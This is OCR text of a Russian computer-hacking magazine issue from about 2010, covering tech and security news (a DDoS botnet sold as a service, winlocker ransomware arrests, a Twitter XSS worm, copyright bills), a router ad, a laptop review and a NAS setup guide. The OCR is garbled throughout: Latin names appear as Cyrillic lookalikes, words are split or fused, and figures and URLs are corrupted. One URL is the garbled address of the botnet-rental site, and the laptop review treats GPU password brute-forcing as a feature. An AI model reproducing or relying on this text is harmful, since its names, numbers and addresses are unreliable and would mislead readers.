ТѴтеперь отсутствует хра н ил и ще да н н ых, та к ка к весь контент п редпола гается 
проигрывать прямо из Сети — при- 
ставка обучена работатьсіТипез, 

ЫеІйіх.УоиТиЬе, Еііскги МоЬіІеМе. 

Также устройство способно за 
п а ру кл и ко в « п од ружиться » с 
компьютером, іРаб, іРбопе 
и іРосІ ТоисГі, и вывести на 
большой экран, скажем, 
фильм или фото. Самое 
приятное во всей этой 
истории — цена нового 
Арріе ТѴ. Всего $99. 




> 3а 9 полных месяцев этого года боодіе приобрел 24 стартапа. 
За весь прошлый год покупок было в три раза меньше. 



ДЛИННЫЕ РУКИ ВЛАСТЕЙ США 



Как известно, борьба с пиратством по ту сторону океана уже давно 
переросла в противостояние не на жизнь, а на смерть. Однако 
правообладателям и властям все мало, им оченьхочется иметь 




возможность закрывать пиратские сайты не только на «своей терри- 
тории», но и по всему миру. Недавно сенату США был представлен 
на рассмотрение крайне неприятный законопроект под названием 
«Акт о борьбе с онлайновыми нарушениями авторского права и 
подделками» (СотЬаІіпдОпІіпе ІпЖіпдетепІ: апб Соипіегіеііз АсГ) . 
Суть документа заключается в том, что министерство юстиции США 
может получить право требовать у американских доменных регист- 
раторов прекращения обслуживания доменных имен «нехороших» 
сайтов. 

Речь идето приснопамятной приостановке делегирования доменного 
имени —ты наверняка помнишь, что именнотаким образом наши 
власти превратили ІюггеЖз.ги в гЖгаскег.огд. Но главная проблема 
заключается в том, что билль предусматривает и возможность обра- 
щения к вышестоящему регистратору в том случае, если исходный 
регистратор является иностранным. 

То есть, говоря простым, человеческим языком: любой сайт, располо- 
женный в зоне .сот, .пеі или .огд можно будет ликвидировать, ведь 
все эти зоны находятся под юрисдикцией США. Ну, а если и домен 
верхнего уровня окажется иностранным, то законопроект предлагает 
блокировать его на уровне интернет-провайдеров страны (по старой 
доброй «китайской схеме»]. 
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УСЛУГИ КРУПНОГО БОТНЕТА 

Американская компания ОаглЬаНа, занимающаяся информационной 
безопасностью, представила на суд общественности отчето своей 
необычной находке. Нет, ботнетами кактаковыми сегодня уже никого 
неудивишь, но откровенно коммерческий ботнет — это всеже что-то 
новенькое. Специалисты ОатЬаІІа обнаружили молодую, но стреми- 
тельно растущую сеть зомбированных компов — ІМОБОЭ. Корни ботне- 
та находятся в Китае, и на протяжении пары последних месяцев число 
машин в ІМОБОЭ ежедневно увеличивается примерно на 10 000. Боль- 
шинство зараженных компов расположены на территории КНР, хотя 
ІМББ05 неплохо развернулся также в США и Европе. Но любопытно не 
это, а тот факт, что создатели сети в открытую торгуют ее услугами — у 




, НЕДОРОГО 

операторов ботнета имеется 
собственный сайт, на котором 
можно не только взять в аренду 
ресурсы сети и провести атаку “ — -.г -- 
на любой ресурс, но и почитать 
статьи, например, отом, как 
сделать Б0о5 более эффектив- Ц” . 
ным. Операторы ботнета за от- 
дельную плату готовы также оказать заказчику техническую поддержку. 
Единственная загвоздка заключается втом, что сайт«предпринимате- 
лей» на китайском языке: ЬНрУ/ѵѵѵѵѵѵ.ітсІсІОБ.огс :). 



> Статистика, собранная компанией Иеіѵѵогк Ьох, сообщает, что 
наибольшее количество вирусов создается в Индии (13,74%) 
и России (11%). 

БЕЗ ОСТРОЙ НЕОБХОДИМОСТИ В СЕТЬ НЕ ХОДИТЬ! 



О нехорошем законопроекте, который рассматривают 
американские власти, мы уже рассказали выше, теперь 
пора рассказать и о наших«аналогах».Увы, порадовать 
нечем — Государственная Дума РФ приняла в окончатель- 
номтретьем чтении законопроектпо внесению изменений 
в четвертую часть Гражданского кодекса, в частности, в ста- 
тью 1 273. Об этом законопроекте мы не раз писали ранее, 
и о нем долго и злобно гудел весь рунет, ведь статья 1 273 
регулирует нормы «свободного воспроизведения произве- 
дений в личных целях». Основная проблема заключается в 
странной формулировке: «Допускается без согласия автора 
или иного правообладателя и без выплаты вознагражде- 
ния воспроизведение гражданином при необходимости 
и исключительно в личных целях правомерно обнаро- 
дованного произведения». Объяснений и определений 
расплывчатого понятия «необходимость» законопроект, 



разумеется, не содержит. Получается, что скачивая из 
Сети и воспроизводя контент, ты имеешь право делать 
это только при некой загадочной «необходимости». 

И если ты не сумеешь доказать эту «необходимость» 
в суде , то , тео рети ч ес ки , тебя м о гут п оса д ить даже за 
кэш картинок в браузере (скачал, смотрел, сохранил, а 
необходимость была?]. Дело втом, что статья 1270 ГК РФ 
гласит: «запись произведения на электронном носите- 
ле, втом числе запись в память ЭВМ, также считается 
воспроизведением». Наказание предусматривает 
штраф в размере от Ютыс. до 5 млн. руб. или лишение 
свободы на срокдо двух лет. Чиновники, конечно, 
уверяют, что поправки нацелены исключительно на 
борьбус пиратами и лицами, использующими контентв 
коммерческих целях. Верится с трудом, тем более что об 
этом в законопроекте тоже нет ни слова. 




> Свершилось! Начиная с версии 5.0 в Зкуре наконец-то появится 
поддержка оффлайновых сообщений, ранее отсутствовавшая ввиду 
Р2Р-архитектуры этого ѴоІР-сервиса 



ОТДЕЛ «К» БОРЕТСЯ С ВИНЛ0КЕРАМИ. УСПЕШНО. 



Настоящий бич последнего времени — винло- 
керы. «Инфекция», которая блокирует систему, 
демонстрирует порнобаннеры и требует отправить 
5М5 на короткий номер для получения ключа 
разблокировки. Пожалуй, за последние парулет к 
каждому ІТ'шнику хоть раз обращалисьзнакомые с 
подобной проблемой (лично ко мне — регулярно). 

И каждый раз, удаляя заразу с очередной машины, 
тихоскрипишьзубами, призывая жуткие кары на 
головытех, кто наживается натаких«взломах». 

Кто бы мог подумать, что чудеса иногда случаются, 
а проклятия доходят до адресатов. В начале сен- 
тября отдел «К» совместно с УБЭП ГУВД Москвы 
ликвидировали преступную группу, которая около 
года зарабатывала на жизньтаким образом. Доход 



команды за это время составил более 500 млн. 
рублей, а количество пострадавших, по офици- 
альным данным, исчисляетсятысячами (какты 
понимаешь, реальные цифры гораздо выше). 
ГУВД сообщает, что обыски и задержания прошли 
одновременно по 20 адресам, было задержано 1 0 
человек, и это нетолько организаторы «бизнеса», 
но и программисты, написавшие вирус, и лица, 
отвечавшиеза обналичиваниеденег, полученных 
посредством 5М5. Кстати, стоимость одной такой 
ЗМЭ’ки колебалась отЗОО до 1000 рублей, а деньги 
хакеры хранили на специально открытом расчет- 
ном счету в одном из коммерческих банков, чье 
название не раскрывается. В ближайшее время 
большинству задержанных будут предъявлены 



обвинения по статьям 1 59 УК РФ (мошенничест- 
во) ист. 273 УК РФ (создание и распространение 
вредоносных компьютерных программ). 
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МЕ6АЫЕѴѴ5 



Х55 УЯЗВИМОСТЬ РАСКРАСИЛА 
ТШТЕК ВО ВСЕ ЦВЕТА РАДУГИ 



Норвежский программист МагнусХольм на 
досуге экспериментировал с ТѵѵіФег, написав 
безвредный (как ему казалось) эксплойт, исполь- 
зовавший дырку в автоматическом копировании 
ссылок на страницы других юзеров. Протер 
решил обкатать свой эксплойт, запостив его в 
Тѵѵіиег. ЧервякХольма преобразовывал текст 
сообщения в монолитные блоки определенного 
цвета (чтобы скрыть содержи мое твитта и заин- 
тересовать «же ртву ») . Ка ко в о же б ы л о уд и вл е н и е 
норвежца, когда его зараза со скоростью лесного 
пожара распространилась по всему микроблог- 
герскому сервису, притом претерпев ряд изме- 



нений. Хакеры всего мира среагировали быстро 
и превратили безобидного червяка в опасный 
малварь. Найденная прогеромХ55-уязвимость 
позволяла внедрить втвитт вредоносный 
сценарий на баѵа5сгірС основой которого была 
команда «опМоизеОѵег». То есть юзеру не нужно 
было даже открывать опасную ссылку — доста- 
точно было просто навести на нее курсор (напом- 
ним, что гадости маскировались под красивые 
цветные полосочки), и в браузере открывались 
новые окна, появлялись всплывающие сообще- 
ния, пользователя перекидывало на сторонние 
ресурсы и такдалее. Плюс ко всему, червь постил 




сам себя в «Тви^ер» очередной жертвы, так 
что темпы заражения быстро достигли отметки 
100 человек в секунду. Закрыли брешьтоже 
быстро — втечение пяти часов. Каквыяснилось, 
в ТѵѵіНег об уязвимости знали и даже исправляли 
ее ранее, но в связи с обновлением сайта что-то 
пошло нетак, и дырка, аки птица Феникс, возро- 
дилась на прежнем месте. 



ТРЕХЯДЕРНЫЙ ПРОЦ НА АРМ-АРХИТЕКТУРЕ 



Компания Магѵеіі с гордостью сообщает, что 
ее разработчики идут на шаг впереди планеты 
всей — недавно они представили первый в мире 
трехъядерный процессор с АРМ-архитектурой и 
встроенной поддержкой 115В 3.0. Имя новинки, 
ориентированной на мобильныеустройства — МагѵеІІАгтасІа 628. Про- 
цессор работает на частоте 1,5 ГГц, обладает кэшем второго уровня, чей 
объем равен 1 Мб, а интегрированный контроллер поддерживает память 
ГР-ООВ2 и БОНЗ (до 533 МГц). Но это еще не все; какуже было сказано 
выше, Агтаба 628 также является и первым мобильным процессором со 




встроенным контроллером ІІ5В3.0. Интересно ито, что два изтрехядер 
АРМ ѵ7 МР образуют высокопроизводительную симметричную пару, вто 
время кактретьеядро может играть роль своеобразного диспетчера тра- 
фика, перераспределяя рабочую нагрузку между первыми двумя. Третье 
ядро может заниматься такими вещами, как мониторинг на грузки, управ- 
ление производительностью и энергопотреблением и такдалее. Все это 
призвано сделать расход энергии более эффективным, а также повысить 
производительность. Сообщается, что новинка совместима с Апбгоіб, 
Ыпих, ѴѴіпбоѵѵз МоЬіІе и ОС НІМ 05, и первые смартфоны и планшетные 
ПК на базе Агтаба 628 должны появиться уже в начале 201 1 года. 



> По данным ІВМ, больше всего незакрытых дырок в своих продуктах 
оставляет компания 5іш - 24% от общего количества уязвимостей. 
Следом идут МісгозоН с 23,3% и Могіііа с 21,3%. 



АШОШМАРКЕТДЛЯ РОССИИ 

Хорошие новости пришли из стана ІТ-гиганта Соодіе. У всех обладателей 
девайсов на базе Апбгоіб 05 скоро появится поводдля радости — магазин 
приложений Апбгоіб Магкеідолжен в ближайшее время официальнозара- 
ботатьдля России. Напомним, что сейчас для российских пользователей 
(равно каки для пользователей многих других стран мира) доступна только 
бесплатная секция магазина, а функция покупки платных приложений 
отсутствует. В Апбгоіб Магкеі сейчас насчитывается более 80 000 софтин, 
из которых61,4% — платные, такчто степень несправедливости оцени сам. 

Согласно письму, которое Соодіе недавно разослал своим разработчикам, 
атакже по информации из ряда сетевых источников, в Апбгоіб совсем скоро 
добавится полноценная поддержка еще 1 2 стран мира (на данный момент 
магазин работает всего с 14 странами), среди которых нетолько Россия, 
но и Бразилия, Финляндия, Польша, Мексика итакдалее. Точныхдатв 
Соодіе пока не называют, ограничиваясьтуманной формулировкой «через 
несколько недель». 




► 014 
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РАСЕВООК-КЛОНЫ ОГОРЧАЮТ 
ГЛАВУ ИНТЕРПОЛА 



О случае на грани курьезного поведал глава 
Интерпола Рональд Ноубл (РопаШ К. ІЧоЫе), 
выступая на первой конференции ІІ\ІТЕРРОІ_ 
ІпГогтабоп Весигбу СопГегепсе. Оказывается, 
всю серьезность, исходящую от киберпре- 
ступлений, мистер Ноубл смогосознать лишь 
послетого, как в социальной сети РасеЬоок 
обнаружились два фэйковых аккаунта, от- 
крытых на его имя. То есть огромные ботнеты, 
ООоЗ-атаки, вирусы, создающиеся специаль- 
но для корпоративного шпионажа, и ба н ков - 
скиетрояны, уводящие со счетов пользова- 
телей миллионы вечнозеленых денег — это 
все фигня. Зато поддельные аккаунты имени 
Рональда Ноубла — это очень серьезная про- 
блема. В конце лета подразделение ЗесигТу 



ІпсісІепІ Резропзе Теат действительно 
обнаружило и пресекло деятельность двух 
«левых» РасеЬоок-учеток, хитрые владельцы 
которых очень правдоподобно прикидыва- 
лисьсамим главой Интерпола. Делалось это 
для того, чтобы попытаться выведать имена 
международных преступников, разыскива- 
емых Интерполом в рамках проводившейся 
вто время операции «ІпГга Реб». Ноубла до 
глубины души шокировало, с какой легкостью 
наглые «хакеры» разжились его личными 
данными и разместили их, наряду с фото, в 
своих анкетах. Также в ходе выступления 
Ноубл подчеркнул, что худшие из зол Сети 
— это анонимность и слабая защищенность 
данных. И кто показал этим людям интернет?.. 



> Из-за неудачной смены дизайна 

посещаемость британской версии йідд упала 
- на 26%. 




на 34%, а американской 





Іпзрігіпд Іппоѵаііоп • Регзізіеп* РегТесІіоп 




2 Комфортная скорость для всех приложений! , 
Графическая настройка приоритетов 

Удобное перераспределение ширины канала между такими приложениями, 
как голосовые программы, игры, приложения, использующие потоки аудио 
и видео, а также РТР и Р2Р 



его беспроводного комфорта 

Не требует специальных знаний! 

Быстрая настройка беспроводной сети и Іпіегпеі 

Утилита А51І5 Е23еІир/ ѴѴР5 ѴѴігагсІ - настройка защищенной беспроводной сети 
и Іпіегпеі-соединения за 2 минуты с предустановками для провайдеров более 
чем в 100 городах России 
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Универсальность и функциональность! 
Подключение Ц$В устройств 

А51І5 Е 1 Рііе Збагіпд - личный сетевой файл-сервер с доступом через Іпіегпеі: 
АЗІІЗ Е 2 Ргіпіег ЗТіагіпд - принт-сервер для поддержки одновременной печати 
и сканирования 



шшш.а$и$.ш 



Гарантия 2 года 



Горячая линия: 8-800-100-2787 



КТ-МЗІІ 

Многофункциональный 
беспроводной 
маршрутизатор 802.1 1 N 



Товар сертифицирован, на правах рекламы. 







РЕВВІІЛЛ 



I Антон Жуков 



ТРЕМРСШВ 




Наш обзор ноутбука АЗУЗ У35.ІС 



о К ноутбукам с диагональю экрана 13 м мы всегда относились 
с особым трепетом. Легкие, стильные - их всегда можно взять 
с собой. И в отличие от не сильно производительных нетбуков, у этих 
ноутов часто очень хороший конфиг. На таком устройстве без проблем 
будет работать какая-нибудь ѴізиаІ Зіисііо, а брутфорс не будет 
занимать целую вечность. Сегодня у нас на тесте: новая 13" модель 
в линейке ноутбуков А5У5 - 1135.1с. 




Удобный и стильный 

А51І8 11353с — небольшой портативный ноут- 
бук. Внешне, каки подобает девайсу, который 
претендует всегда и в любых условиях быть в 
деле, он выглядит строго, но стильно: черный 
цвет, классический дизайн, металлическая 
крышка, чуть закругленные углы. Такой не 
стыдно поставить и на стол в офисе, и за сто- 



ликом в кафе. Весдевайса чуть меньше двух 
килограммов — то, что нужно для ноутбука, 
который должен быть всегда под рукой. Что 
примечательно, у ноута матовое покрытие, 
на котором не остаются разводы и отпечатки 
пальцев —то, чтотакбеситв большинстве 
современных ноутов. 

Девайс оснащен 13.3" І_ЕО дисплеем с разре- 
шением 1366х768точек, прекрасно подходя- 



щим для просмотра 720р-видео. Рабочая об- 
ласть также покрыта матовым покрытием, что 
сейчас большая редкость. Открыв в первый 
раз ноутбук, я, признаться, стал лихорадочно 
искать тачпад. Дело втом, что дизайн бука 
выполнен так, что тачпад по свету л ишь не- 
много отличается отокружающего покрытия 
и потому почти незаметен. Зато на ощупь он 
удобен, а по отзывчивости — чувствительный. 
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Технические характеристики: 

• Процессор: ІпіеІ® Соге™ ІЗ-370М 2,4 ОНг 

• Шина: 2.5 ГТ/с 3 МЬ 12 СасЬе 

• Оперативная память: 2 Гб 

• Жесткий диск: 640 Гб 

• Размеры: 25x322x233 мм 

• Вес: 1.9 кг 

• Дисплей: 13.3 дюйма 1,366x768 

• Видеокарта: пѴісІіа ОеРогсе 310М, 1024 Мб , Доп. карта: ІпіеІ® ОМА НЮ 

• Звуковая карта: ІпіеІ® НідЬ ОеПпіІіоп Аисііо 

• Связь: ЬАЫ 10/100/1000 

• Беспроводная связь: ВІиеІооіЬ 2.1 + ЕОР, ѴѴіРі (802.11а/Ь/д/п) 

• Порты: ЗхІІ5В(2.0), Кепзіпдіоп зесигііу, Ііпе-оиі, НЮМІ, Міс-іп, Ѵ6А 

• Слоты расширения: СагсІ Реасіег (50/ЛЛЛЛС/М5/Рго/хО) 

• Батарея ІЛ-Іоп 5600 мАч (до 8.0 часов) 



Отдельно стоит сказать про клавиатуру. Несмотря на компактные 
размеры, лэптоп имеет полноценную клаву с правильным расстоя- 
нием между кнопками — без каких-либо невнятных дизайнерских 
экспериментов, которые обычно все портят. Ход клавиш небольшой, 
сходу начинаешь печатать без ошибок. Стандартно присутствуют 
клавиши для управления громкостью, яркостью, для быстрого пе- 
рехода в гибернацию и отключения ѴѴі-Рі-адаптера. Единственным 
минусом клавиатуры являетсято, что она немного прогибается при 
нажатии на клавиши. Ноутбук оснащен двумя кнопками включения 
— вторая запасная, на случай, если сломаешь первую :). Шучу. На са- 
мом деле разница в них втом, что при нажатии на правую загружает- 
ся операционная система. А при нажатии на левую за несколько се- 
кунд стартует мини-операционка А81ІВ Ехргезз баіе с набором часто 
используемых функций (интернет, музыка, фотографии, мессенджер, 
и т.п.) и возможностью последующей загрузки основной ОС. 

Правильный конфиг 

А51І5 11353 с собран на базе набора системной логики МоЬіІе ІпіеІ® 
НМ55 Ехргезз. В зависимости от комплектации, А5І35 11353с может 
быть оснащен двухъядерным процессором ІпіеІ® Соге™ іЗ или 
Соге™ І5 стактовой частотой 2,4 6 Н 2 . Соге™ І5 помимо прочего 
поддерживает новую технологию ІпіеІ® ТигЬо Воозідля автома- 
тического увеличения тактовой частоты процессора, что приводит 
кувеличению производительности однопоточных и многопоточ- 
ных приложений. Фактически, это технология интеллектуального 
«саморазгона» процессора. Мало этого, А5І35 использует функцию 
Зирег НуЬгісІ Епдіпе (5НЕ), которая в интеллектуальном режи- 
ме способна увеличивать частоту процессора в зависимости от 
нагрузки, позволяя получить прирост производительности до 1 0 %. 
Также в зависимости от комплектации объем оперативной памяти 
БОРЗ может варьироваться от2до4 Гб, а объем винчестера от320 
до 640 Гб. Если размера винчестера недостаточно для хранения 
информации, в наличии имеется 3 115В- порта для подключения 
внешних дисков. Лэптоп оснащен двумя видеокартами: дискретной 
(пѴісІіа ОеРогсе 31 ОМ) и интегрированной (ІпіеІ® ОМА ЕЮ]. Благода- 
ря технологии пѴісІіа Орііппиз ноутбук может переключаться между 
интегрированной и дискретной видеокартами. Технология опреде- 
ляет, когда необходима большая, либо меньшая производительность 
и включает соответствующую карточку. Данный способ позволяет 
сэкономитьзаряд батареи, увеличивая время автономной работы 
до 8 часов. Ну, это в обычном режиме. А на сколько хватит 5600 мАч 
батареи при максимальных нагрузках? Чтобы проверить, воспользу- 
емся утилитой Ваііегу Еаіег ( Ьаііегуеаіег.сот і, После полной зарядки 
батареи отсоединяем питание, и утилита будет проверять батарейку 
на прочность. Тесты показали, что заряда аккумулятора хватает на 
полтора часа работы при максимальной нагрузке. Разуж пошла речь 
о бенчмарках, что там по поводу производительности видеокарт? 
Конечно, это неигровой ноутбук: ОеРогсе 31 ОМ не хватит, чтобы 
рубиться в Саіі 01 Оиіу 4 или другие новинки. Но многие нетребова- 
тельные игрушки на данной карточке, несомненно, пойдут. Ктому 



же она поддерживаеттехнологию пѴісІіа США, обеспечивающую 
аппаратноеускорение некоторых приложений. Правда, постоянное 
переключение междудискретной и интегрированной видеокартой 
может выйти боком — некоторые программы, использующиетехно- 
логию США, вылетают. С хакерской точки зрения, поддержка данной 
технологии довольно важна, таккакмногие брутфорсеры используют 
ее для ускорения подбора паролей. Для проверки скорости работы 
использовался Ехігете ѲРІІ Вгиіеіогсег (ѵѵѵѵѵѵ.іпзіЗергс.сопп/епд/едЬ. 
зМшІ). В частности, при бруте М05-хэша скорость перебора составила 
41 1 миллионов паролей в секунду, что на порядоквыше обычного 
перебора. 

Рабочая лошадка 

Если говорить про ноутбук кратко, то лучше всего подходит извест- 
ная поговорка: «Мал, да удал». Модель 11353с может стать отличной 
рабочей лошадкой, на которой можно поработать в любом месте: на 
работе в офисе, в пути в поезде, дома на диване. Видеокарты недоста- 
точно, чтобы играть втоповые игры, но зато технология пѴісІіа Оріітиз 
позволитавтономно работать в течение восьми часов (естественно, 
поддерживается новомодный 802.1 1 п). Многочисленные средства 
коммуникации (Віиеіооіб, ѴѴіРі, І_АІ\І) не дадут почувствовать себя 
отрезанным от мира. Хорошие динамики АИес І_апзіпд с поддержкой 
технологии 5Р5 Ргетіипп ЗоипсІ позволят насладиться любимой 
музыкой, а микрофон и видеокамера — предоставят возможность 
пообщаться с друзьями по скайпу. Короче говоря, ноутбук можно реко- 
мендовать тем, кто не гонится за графической производительностью, 
но ищет рабочую лошадку для работы, при этом уделяя внимание 
внешнему в иду устройства. 




ТРЕМОСШВ 



Подробнее о ноутбуках А51І5 и других гаджетах вы можете узнать в 
новом дискуссионном сообществе на ІгепсІсІиЬ.ги . Тгепб Сіи Ь — дис- 
куссионный клуб для тех, кто интересуется прогрессом и задумывает- 
ся о будущем. Участники Тгепб Сіи Ь обсуждаюттехнические новинки, 
информационныетехнологии, футурологию и другиетемы завтраш- 
него дня. Тгепб СІиЬ поддерживается компаниями ІпіеІ® и А51І5 и 
проводит регулярные конкурсы с ценными призами. 



Корпорация ІпіеІ, ведущий мировой производитель инновационных полупроводниковых 
компонентов, разрабатывает технологии, продукцию и инициативы, направленные на 
постоянное повышение качества жизни людей и совершенствование методов их работы. 
Дополнительную информацию о корпорации ІпіеІ можно найти наѴѴеЬ-сервере компании 
ІпіеІ ГіНр://ѵѵѵѵѵѵ. ІпіеІ. ш, а также на сайте ГіПр://Ыодз. ІпіеІ. сот. Для получения дополнитель- 
ной информации о рейтинге процессоров ІпіеІ посетите сайт ѵѵѵѵѵѵ. ІпіеІ. ги/гаііпд. 
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Используем ИА5 
на полную катушку 




© Рассказывая о МАЗ Зупоіоду, мы упомянули йЗМ - классной 
фирменной ОС от Зупоіоду, под управлением которой работает 
это сетевое хранилище. По сути, это полноценный Ышіх, который 
максимально оптимизирован для работы с КАШ, дисковыми и сетевыми 
контроллерами. Однако Зупоіоду 05210+ способен на много большее, 
чем только хранение файлов и раздачу их по сети. МАЗ позволяет 
поднять несколько очень полезных сервисов, и благодаря встроенной 
ОС сделать это будет максимально просто. 



КАК МЫ УЖЕ ВЫЯСНИЛИ, ЫА5 — ЭТО, ПО 
СУТИ, НЕБОЛЬШОЙ И БЕСШУМНЫЙ КОМ- 
ПЬЮТЕР. Было бы странно, если бы произ- 
водители ограничивались исключительно 
функцией хранения и сетевого шаринга 
файлов. Поэтому при покупке большинства 
продвинутых ІЧАЗ’ов, потребитель получает 
еще и ряд полезных бонусов. Но эти самые 
дополнительны возможности напрямую 
зависят от ПО, которое используется в І\ІА5. 
Поэтому сегодня мы попробуем посмотреть, 
на что способна операционная система 
Зупоіоду Оізк Зіаііоп Мападег. 

ТоггепТ-клиент 

Первое и самое очевидное, что можно заста- 
вить делать І\ІА5 — это скачивать тяжелые 
файлы из интернета. Действительно, зачем 
ждать часами или засыпать под шум куле- 
ров, пока из торрентов сливается очередной 



образ, если это легко можно доверить ІЧАЗ’у? 
Уж что-что, а ВііТоггепІ-клиент поднять под 
Ыпих’ом — уж точно не проблема, да и веб- 
интерфейсов для управления консольными 
клиентами тоже предостаточно. Впрочем... 
не придется даже заморачиваться: любой 
ІМА5 Зупоіоду, и в том числе и 05210+, под- 
держивает функцию Ооѵѵпіоасі Зіаііоп. По 
сути, это универсальный менеджер закачек, 
который управляется через веб-интерфейс. 
Все, что требуется для его включения — это 
один клик в админке ЫАЗ’а, активирующий 
соответствующую опцию. Далее ты прямо 
через браузер получаешь доступ к интерфей- 
су встроенной в ІМА5 качалки. Добавление 
закачек по нужному протоколу (ВііТоггепІ, 
НТТР, РТР), управление текущими задача- 
ми, увеличенные или уменьшение ширины 
канала, который будет использоваться — все 
осуществляется из одного единственного 



места. Мало этого, чтобы не мешать работе, 
можно настроить Ооѵѵпіоасі Зіаііоп 2 так, 
чтобы закачка файлов из Сети осуществля- 
лась в определенные интервалы времени 
с помощью расписания. Что все это дает? 
Встроенный в І\ІА5 торрент-клиент качает 
файлы круглые сутки, складывая их в одно 
место — и они тут же доступны на всех ком- 
пьютерах в локальной сети. Получаем всегда 
положительный рейтинг на трекерах и ника- 
кого шума! :) К тому же, при соответствую- 
щей настройке, можно сделать интерфейс 
доступным «снаружи», из внешней сети, 
и в таком случае добавить дома закачку 
можно, где бы ты в действительности ни 
находился. 

Доступ откуда угодно 

К сожалению, в интернете статический 
ІР-адрес, по которому ты всегда можешь 
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обратиться к сетевым устройствам у себя в сети — большая ред- 
кость. Чаще всего ІР-адрес постоянно меняется, а за «статику» 
провайдер требует деньги. Обидное ограничение легко можно 
обойти, воспользовавшись Оупаппіс ОІМЗ-сервисом. По сути, это 
специальный сервер, который совершенно бесплатно хранит 
запись о выбранном тобой доменном имени (скажем, тузегѵег. 
сіупсіпз.огд) и актуальном ІР-адресе твоего компьютера. Последний 
постоянно обновляется за счет клиентской части, которая с 
определенным интервалом отправляет на ВОІМЗ-сервер текущий 
ІР-адрес, выданный провайдером. Большая часть сетевого обору- 
дования поддерживает В0ІМ5 из коробки, и ІМА5 от Зупоіоду тут не 
исключение. Необходимо лишь завести аккаунт на ОВЫЗ-сервисе 
(например, сіупсіпз.огд) и прописать его данные в интерфейс йЗМ. 

В результате для подключения извне к І\ІА5 не нужно будет знать 
ІР, который постоянно меняется — вместо этого можно будет 
использовать доменное имя, обслуживаемое ВРЫЗ-сервисом. 
Управлять с работы домашними накопителем, получать, отправлять 
нужные файлы, ставить на закачку новые торренты, управлять 
пользователями и правами и пр. — все можно делать удаленно. 

Веб-демон 

При желании можно даже создать свой собственный хостинг, 
если поднять на І\ІА5 веб-демон и сервер баз данных. В случае с 
продвинутым ІМАЗ’ом не придется ковыряться с исходниками, ком- 
пилировать код и даже возиться с конфигами. Эта история и про 
Зупоіоду Р521 0+, в котором доступна готовая служба ѴѴеЬ Зіаііоп. 
Один клик мыши в интерфейсе йЗМ — и включается веб-демон, 
РНР-интерпретатор и демон Му50І_. На сайте Зупоіоду есть даже 
список популярных движков для создания блога, конференции, 
электронного магазина, которые были протестированы в связке 
с ѴѴеЬ Зіаііоп. Едва ли стоит устраивать из 05210+ полноцен- 
ный хостинг, но поднять какой-нибудь блог или сервисный сайт 
и, скажем, отображать на нем статистику — это запросто. Кстати, 
разработчики наперед подумали, что может понадобиться, поэтому 
некоторые распространенные решения доступны в виде легко уста- 
навливаемых пакетов (их можно скачать с сайта ѵу\ллл/.5ѵпоІодѵ.сот/ 
епи/аррз/іпсІех.рЬр ). Готовое решение для сбора и отображения 
статистики готово в виде пакета ѴѴеЬа Іігег. А для управления базой 
данных Му50І_ легко устанавливается рбрМуАбтіп. Установочный 
пакет представляет собой рзк-файл, который легко подключается 
к системе через интерфейс «БЗМ» — достаточно перейти в раздел 
«Система -> Управление пакетами». 

Дополнительные пакеты 

За счет системы пакетов дополнительные модули устанавливается 
не сложнее, чем приложения под виндой. Мало этого, у Зупоіоду 
уже сформировалось довольно мощное компьюнити. Поэтому ты не 
ограничен лишь темы сборками, которые подготовили официаль- 
ные разработчики. В онлайн-конференции (правде, англоязычной) 
1огит.5упо1оду.сот множество энтузиастов активно делятся свои- 
ми собственными сборками, выкладывая для всеобщего пользова- 




Веб-интерфейс встроенного в ЫА5 менеджера закачек 



ния готовые к применению РЗК-файлы. Для любителей поэкспе- 
риментировать создан специальный раздел — «ТЬе ІІпбегдгоипсІ 
(Мосісіегз беге!)», это то, что нам нужно. Пакеты распределены по 
различным группам: организация потокового видео, менеджеры 
закачек, сервисы для программистов (в том числе сервер кон- 
троля версий ЗиЬѵегзіоп), модули для безопасности и т.д. Ты и 
сам можешь разрабатывать ПО, оформляя бинарник в виде Р5К 
пакета — для этого на сайте есть вся документация и специфи- 
кации. Отмечу одну очень интересную штуку — менеджер пакетов 
ІРОК. Если подключить его к системе, то ты сразу получаешь воз- 
можность устанавливать сотни приложений из ІРОК-файлов. Я, к 
примеру, первым делом инсталлирую файловый менеджер тс для 
удобства работы с конфигами. Подписавшись на специальный фид 
с пакетами, ты получаешь доступ к огромному количеству линуксо- 
вых приложений, готовых к установке. 

Фотоальбом 
и видеонаблюдение 

Если ты хочешь быстро и без лишних хлопот поднять онлайн 
фотоальбом, доступный из локалки и Инета, то можно воспользо- 
ваться встроенным в І\ІА5 Зупоіоду приложением Рбоіо Зіаііоп. 
Обратившись к его веб-интерфейсу, ты можешь сделать доступ- 
ными через веб все фотографии, хранящиеся на сетевом накопи- 
теле (а точнее те, которые лежат в папке общего доступа рбоіо). 
Наличие функции построения блога позволит не только показать 
фотографии, но и даст возможность друзьям и знакомым оставить 
свои комментарии. Доступ к фотоальбому можно ограничивать с 
помощью пароля: ты сам решаешь, кому и когда можно просмат- 
ривать ваш фотоархив, а также, какую его часть. Кстати, к самому 
І\ІА5 можно подключить любой ІІЗВ-принтер, в том числе для 
печати фотографий — в этом случае он станет доступным для всех 
компьютеров из локальной сети. 

Еще одна интересная опция — это поддержка ІР-камер, с помо- 
щью которых можно устроить круглосуточное видеонаблюдение. 
ІР-видеорегистратор позволяет вести запись видеопотока, получа- 
емого с ІР-камер, на жесткие диски ІМАЗ’а. В дальнейшем получен- 
ные файлы видеозаписи ты можешь свободно перемещать, копи- 
ровать и просматривать как средствами самого І\ІА5 Зупоіоду, так и 
внешними программными или аппаратными медиаплеерами через 
в локальную сеть. За работу с видеонаблюдением во встроенной 
системе управления Зупоіоду йізк Зіаііоп Мападег отвечает выде- 
ленное сервис-приложение «Зигѵеіііапсе Зіаііоп». Правда, можешь 
не обольщаться, доставая старую 115В веб-камеру — придется 
дополнительно потратиться именно на полноценную ІР-камеру. Но 
если купить ѴѴі-Бі камеру, умеющую передавать изображение на 
расстоянии, можно мониторить все, что угодно: лестничную клетку 
или, скажем, машину во дворе. 

Напоследок замечу, что я работал с Оізк Зіаііоп Мападег версии 
2.3. Вместе с тем, на сайте уже появились прошивки с бета-вер- 
сией йЗМ 3.0, а также доступна онлайн демка для ознакомления, 
а с 28-го сентября 2010 года стала доступна официальная версия 
ЭЗМ 3.0 для России. И без того качественный интерфейс админки, 
стал еще более продуманным и удобным в использовании. 

И очень скоро станет стандартным для всех ЫА5 Зупоіоду. 
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ТЕСТИРОВАНИЕ 

производительных видеокарт 



о Видеоплаты, которые стоят больше, чем средний системный блок, 
